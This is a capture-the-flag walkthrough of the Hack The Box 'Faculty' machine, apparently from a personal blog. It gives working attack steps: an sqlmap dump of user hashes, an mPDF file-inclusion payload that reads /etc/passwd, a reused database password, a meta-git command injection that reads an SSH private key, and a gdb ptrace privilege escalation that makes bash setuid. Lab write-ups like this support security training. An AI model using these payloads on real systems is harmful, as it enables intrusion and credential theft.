Faculty - HTB - Key Points

Target's IP: 10.10.11.169


PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

http-title: Did not follow redirect to http://faculty.htb

Javascript on login page suggests that if you intercept response and change 3 to 1 you can bypass login

sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump

Administrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | admin

Generating PDFs as an authenticated user, you can see that the tool used to create the files is a mPDF software that is subject to a LFI vulnerability:
<h1>ciao</h1><annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
which, when properly encoded, needs to be supplied as follows:
JTI1M0NoMSUyNTNFY2lhbyUyNTNDL2gxJTI1M0UlMjUzQ2Fubm90YXRpb24lMjUyMGZpbGU9JTI1MjIvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=

gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash


Using the same exploit to read the php files of the webserver, we find out that the file used to connect to the database contains a password:
Co.met06aci.dly53ro.per

It turns out to be gbyolo's password, so we can log into the box using ssh.

gbyolo can run meta-git as user developer. Googling, there is an easy exploit that allows us to achieve command execution as developer, like this:
sudo -u developer /usr/local/bin/meta-git clone 'tmp||cat /home/developer/.ssh/idrsa'


developer@faculty:~$ cat user.txt 
0b...8a


Checking for binary capabilities, gdb has sysptrace capability, allowing us to attach to processes running as root. There is a Python one running, if we attach to it we can call the system function and execute commands as root.

(gdb) call (void)system("ls")
[Detaching after vfork from child process 62096]
(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 62111]
(gdb) quit
A debugging session is active.
        Inferior 1 [process 725] will be detached.
Quit anyway? (y or n) y
Detaching from program: /usr/bin/python3.8, process 725
[Inferior 1 (process 725) detached]
developer@faculty:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
developer@faculty:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt 
7b...6e
Merry hacking ;)


You'll only receive email when they publish something new.

More from emacab98
All posts